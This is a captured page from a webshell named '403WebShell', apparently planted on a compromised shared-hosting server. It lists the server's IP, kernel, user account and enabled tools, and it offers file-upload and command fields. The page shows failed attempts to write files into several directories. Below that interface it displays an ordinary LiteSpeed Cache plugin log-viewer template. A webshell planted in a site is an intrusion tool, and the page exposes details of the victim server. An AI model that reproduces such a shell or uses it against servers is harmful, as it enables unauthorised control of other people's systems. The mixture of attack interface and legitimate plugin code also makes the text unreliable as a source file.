Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.144.16.40
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/src/litespeed-wp-plugin/6.2.0.1/litespeed-cache/tpl/toolbox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/src/litespeed-wp-plugin/6.2.0.1/litespeed-cache/tpl/toolbox/log_viewer.tpl.php
<?php

namespace LiteSpeed;

defined( 'WPINC' ) || exit;

$logs =
	array(
		array(
			'name' => 'debug',
			'label' => esc_html__( 'Debug Log', 'litespeed-cache' ),
			'accesskey' => 'A',
		),
		array(
			'name' => 'debug.purge',
			'label' => esc_html__( 'Purge Log', 'litespeed-cache' ),
			'accesskey' => 'B',
		),
		array(
			'name' => 'crawler',
			'label' => esc_html__( 'Crawler Log', 'litespeed-cache' ),
			'accesskey' => 'C',
		),
	);

/**
 * Return a subnav button (subtab)
 * @since  4.7
 */
function subnav_link( $item ) {
	$class = 'button ';
	$subtab = '';

	if ( ! isset( $item['url'] ) ) {
		$class .= 'button-secondary';
		$subtab_name = "{$item['name']}_log";
		$subtab = "data-litespeed-subtab='{$subtab_name}'";
		$url ="#{$subtab_name}";
	}
	else {
		$class .= 'button-primary';
		$url = $item['url'];
	}

	$accesskey =
		isset( $item['accesskey'] )
		? "litespeed-accesskey='{$item['accesskey']}'"
		: '';
	$label = isset( $item['label'] ) ? $item['label'] : $item['name'];

	return "<a href='{$url}' class='{$class}' {$subtab} {$accesskey}>{$label}</a>";
}

/**
 * Print a button to clear all logs
 * @since  4.7
 */
function clear_logs_link( $accesskey = null ) {
	$item =
		array(
			'label' => esc_html__( 'Clear Logs', 'litespeed-cache' ),
			'url' => Utility::build_url( Router::ACTION_DEBUG2, Debug2::TYPE_CLEAR_LOG ),
		);
	if ( null !== $accesskey ) {
		$item['accesskey'] = $accesskey;
	}
	echo subnav_link( $item );
}

$subnav_links = array();
$log_views = array();

foreach( $logs as $log ) {
	$subnav_links[] = subnav_link( $log );

	$file = LSCWP_CONTENT_DIR . "/{$log['name']}.log";
	$lines = File::count_lines( $file );
	$start = $lines > 1000 ? $lines - 1000 : 0;
	$lines = File::read( $file, $start );
	$lines = $lines ? trim( implode( "\n", $lines ) ) : '';

	$log_views[] =
		"<div class='litespeed-log-view-wrapper' data-litespeed-sublayout='{$log['name']}_log'>"
			. "<h3 class='litespeed-title'>{$log['label']}</h3>"
			. '<div class="litespeed-log-body">'
				. nl2br( htmlspecialchars( $lines ) )
			. '</div>'
		. '</div>';
}
?>

<h3 class="litespeed-title">
	<?php esc_html_e( 'LiteSpeed Logs', 'litespeed-cache' ); ?>
	<?php Doc::learn_more( 'https://docs.litespeedtech.com/lscache/lscwp/toolbox/#log-view-tab' ); ?>
</h3>

<div class="litespeed-log-subnav-wrapper">
	<?php echo implode( "\n", $subnav_links ); ?>
	<?php clear_logs_link( 'D' ); ?>
</div>

<?php echo implode( "\n", $log_views ); ?>

<?php
clear_logs_link();

Youez - 2016 - github.com/yon3zu
LinuXploit